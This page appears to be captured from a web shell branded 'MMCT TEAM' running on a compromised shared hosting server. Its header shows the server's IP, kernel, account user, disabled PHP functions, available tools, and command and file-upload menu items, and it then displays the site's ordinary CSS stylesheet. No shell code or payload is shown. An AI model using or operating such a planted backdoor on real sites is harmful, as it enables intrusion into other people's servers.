MMCT TEAM
Server IP : 153.92.220.142  /  Your IP : 216.73.216.165
Web Server : LiteSpeed
System : Linux nl-srv-web513.main-hosting.eu 5.14.0-503.34.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Mar 27 06:00:50 EDT 2025 x86_64
User : u444427800 ( 444427800)
PHP Version : 8.1.32
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u444427800/domains/velvethomez.com/../zinitechcare.com/public_html/css/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u444427800/domains/velvethomez.com/../zinitechcare.com/public_html/css/reset.css
@import url("https://fonts.googleapis.com/css2?family=Lobster&family=Nunito:wght@200;300;400;500;600;700;800;900&family=Poppins:wght@500;600;700;800;900&family=Raleway:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;1,100&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap");
@import url("https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css");
* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}

.container {
  max-width: 1400px;
  margin: auto;
}
:root {
  --theme-color: #466439;
  --text-color: gray;
  --btn-color: #faeaa1;
  --theme-bg-light: #f8f8f8;
  --body-text-color: #757f95;
  --color-white: #ffffff;
  --color-dark: #100f0d;
  --border-info-color: rgba(0, 0, 0, 0.08);
  --bs-progress-bar-color: #fff;
  --bs-progress-bar-transition: width 0.6s ease;
  --box-shadow: 0 0 40px 5px rgb(0 0 0 / 5%);
  --body-font: "Roboto", sans-serif;
  --footer-bg: #151515;
  --footer-bg2: #101010;
  --footer-text-color: #f5faff;
  --transition: all 0.5s ease-in-out;
}

a:hover {
  text-decoration: none;
  color: #000;
}

a {
  text-decoration: none;
}

li {
  list-style: none;
}
.mx-auto {
  margin: auto;
}
.mt-5 {
  margin-top: 3rem !important;
}
.flex-row {
  display: flex;
  flex-wrap: wrap;
}

.theme-btn {
  font-size: 14px;
  color: var(--color-white);
  padding: 15px 20px;
  transition: all 0.5s;
  text-transform: uppercase;
  position: relative;
  border-radius: 0;
  font-weight: 600;
  letter-spacing: 1px;
  cursor: pointer;
  text-align: center;
  overflow: hidden;
  border: none;
  background: var(--theme-color);
  box-shadow: var(--box-shadow);
  z-index: 1;
}

button {
  padding: 0;
  cursor: pointer;
}

body {
  font: 16px;
  font-family: "Roboto Condensed", sans-serif;
  overflow-x: hidden;
}

.row {
  display: flex;
  flex-flow: row wrap;
}
.justify-content-between {
  justify-content: space-between;
}
.justify-content-center {
  justify-content: center;
  gap: 1rem;
}
.pb-20 {
  padding-bottom: 20px;
}

.flex-gallery {
  display: flex;
  justify-content: center;
  align-items: center;
  gap: 1.5rem;
}

.justify-content-evenly {
  justify-content: space-evenly;
}
.span {
  font-size: 15px;
  font-weight: 600;
  padding: 0px 0 10px 0;
}
.w-100 {
  width: 100%;
}
.input {
  width: 100% !important;
}

.h3 {
  color: rgb(26, 29, 36) !important;
}
.mr-20 {
  margin: 2rem;
}
.mr-40 {
  margin: 4rem;
}
.hero-sub-title {
  color: #fff;
  background-color: var(--theme-color);
  padding: 10px;
  border-radius: 50px;
  width: 30%;
  text-align: center;
}

.ptb-20 {
  padding: 20px 0px;
}

/* .row [class^="col-"] {
    flex: 1 0 auto;
    padding: 0 1rem;
} */

.col-1 {
  width: calc(8.33% - 5px);
}

.col-2 {
  width: calc(16.66% - 5px);
}

.col-3 {
  width: calc(25% - 5px);
}

.col-4 {
  width: calc(33.33% - 5px);
}

.col-5 {
  width: calc(41.66% - 5px);
}

.col-6 {
  width: calc(50% - 5px);
}

.col-7 {
  width: calc(58.33% - 5px);
}

.col-8 {
  width: calc(66.66% - 5px);
}

.col-9 {
  width: calc(75% - 5px);
}

.col-10 {
  width: calc(83.33% - 5px);
}

.col-11 {
  width: calc(91.66% - 5px);
}

.col-12 {
  width: calc(100% - 5px);
}

.img-resp {
  max-width: 100%;
  height: auto;
}
.position-relative{ position: relative;}
.flex-gen {
  display: flex;
  justify-content: space-between;
  align-items: center;
}
.pt-20 {
  padding: 20px 0;
}

.pt20 {
  padding-top: 20px;
}

.flex {
  display: flex;
  justify-content: center;
  align-items: center;
}
.img-h-350 {
  /* width: 350px; */
  height: 400px !important;
}
.ptb-0 {
  padding: 0px 10px;
}
.mt-15 {
  margin-top: 15px;
}

.flex-gallery {
  display: flex;
  justify-content: center;
  align-items: center;
  gap: 1.5rem;
}
.flex-dir {
  display: flex;
  flex-direction: column;
  align-items: center;
}
.flex-wrap {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
  align-items: center;
}
.h1 {
  color: #fff;
}

.align-center {
  align-items: center;
}

.justify-space-bet {
  display: flex;
  justify-content: space-between;
}

.pr-20 {
  padding-right: 20px;
}

.relative {
  position: relative;
}

.light-p {
  color: #737373;
  font-size: 14px;
}

h1 {
  font-size: 32px;
  font-weight: 600;
  letter-spacing: 0.5px;
}

h2 {
  font-size: 30px;
  font-weight: 600;
  letter-spacing: 0.5px;
}

h3 {
  font-size: 27px;
  font-weight: 500;
  letter-spacing: 0.5px;
}

.h3 {
  font-size: 27px;
  font-weight: 700;
  letter-spacing: 0.5px;
}

h4 {
  font-size: 21px;
  font-weight: 500;
  letter-spacing: 0.5px;
}

h5 {
  font-size: 18px;
  font-weight: 500;
  letter-spacing: 0.5px;
}

h6 {
  font-size: 18px;
  font-family: 600;
  letter-spacing: 0.5px;
}

.w-40 {
  width: 40%;
}

#h6 {
  font-size: 16px;
  font-family: 600;
  letter-spacing: 0.5px;
}

p {
  font-size: 14px;
  font-weight: 500;
  letter-spacing: 0.5px;
  color: var(--body-text-color);
}

.pt-5 {
  padding-top: 5px;
}
.pt-10 {
  padding-top: 10px;
}

.ptb-10 {
  padding: 10px 0;
}

.ptb-50 {
  padding: 50px 0px;
}

.pd-10 {
  padding: 10px;
}

.pl-10 {
  padding-left: 10px;
}

.prl-1 {
  padding: 0 1rem;
}

a {
  font-size: 14px;
  font-weight: 500;
  letter-spacing: 0.5px;
  color: #000;
  text-decoration: none;
}

img {
  width: 100%;
}

iframe {
  width: 100%;
  display: block;
}

.text-center {
  text-align: center;
}
.light-para {
  color: #fff;
  font-size: 13px;
  font-weight: 600;
}

.text-white {
  color: #fff;
}
.section-get {
  background-color: rgb(26, 29, 36);
}

.flex-row {
  display: flex;
  flex-wrap: wrap;
}

.flex-Row {
  display: flex;
  align-items: center;
  justify-content: center;
}

.all-center {
  display: flex;
  justify-content: center;
  align-items: center;
}

.space-between {
  justify-content: space-between;
}

.space-around {
  justify-content: space-around;
}

.space-end {
  justify-content: end;
}

.bold {
  color: #bb9338;
}

.ptb {
  padding: 10px 0;
}

.ptb-20 {
  padding: 20px 0px;
}

.pr-5 {
  padding-right: 5px;
}

.pb-20 {
  padding-bottom: 20px;
}

.text-justify {
  text-align: justify;
}

.p-bottom {
  padding-bottom: 50px;
}

.p-top {
  padding-top: 70px;
}
.p-0 {
  padding: 0px !important;
}

.ptb-20 {
  padding: 20px 0;
}

.form-group {
  display: flex;
  flex-direction: column;
}
.form_group-1 .form_control-1 {
  width: 1.1rem;
  height: 1.1rem;
  color: #bb9745;
}

.form-group label {
  font-size: 13px;
  font-weight: 600;
  padding: 0.7rem 0px;
}
.group {
  font-size: 13px;
  font-weight: 600;
  padding: 0.7rem 0px;
  display: flex;
  align-items: center;
  gap: 10px;
}
.flex-dir {
  display: flex;
  flex-direction: column;
}
.btn_1 {
  width: 10rem;
  height: 45px;
}

.btn_2 {
  transition: all 0.8s ease-out;
  line-height: 24px;
  font-weight: 500;
  text-align: center;
}
.btn_2 i {
  align-items: center;
  padding-left: 5px;
  font-size: 16px;
}
.btn_2:active {
  transform: scale(0.9);
}

.btn-secondary {
  color: #3bb77e;
  background: #fff;
  font-size: 15px;
  font-weight: 400;
  border: none;
  border-radius: 4px;
  border: 1px solid #ececec;
  padding: 11px 23px;
}

.btn_btn {
  color: #3bb77e;
  background: #fff;
  font-size: 15px;
  font-weight: 600;
  border: none;
  border-radius: 30px;
  border: 1px solid #ececec;
  padding: 11px 23px;
  transition: all 0.8s ease-out;
}
.btn_btn:hover {
  background-color: rgba(231, 80, 80, 0.936);
  color: #fff;
}

.active {
  background-color: #000000 !important;
  color: #fff !important;
  border-radius: 42px;
}

.btn_2 {
  cursor: pointer;
}
.btn_2:hover {
  background-color: orange;
  color: #fff;
}
.btn {
  font-size: 13px;
  font-weight: 600;
  padding: 9px 20px;
  border-radius: 3px;
  color: white;
  background: #262626;
  /* box-shadow: 4px 4px 0px 0px #000000a3; */
}

.form-group .input-field {
  width: 275px;
  height: 42px;
  padding: 0px 10px;
  border: 1px solid #b9c3bea8;
  outline: none;
  border-radius: 5px;
  box-shadow: rgba(50, 50, 105, 0.15) 0px 2px 5px 0px,
    rgba(0, 0, 0, 0.05) 0px 1px 1px 0px;
}

MMCT - 2023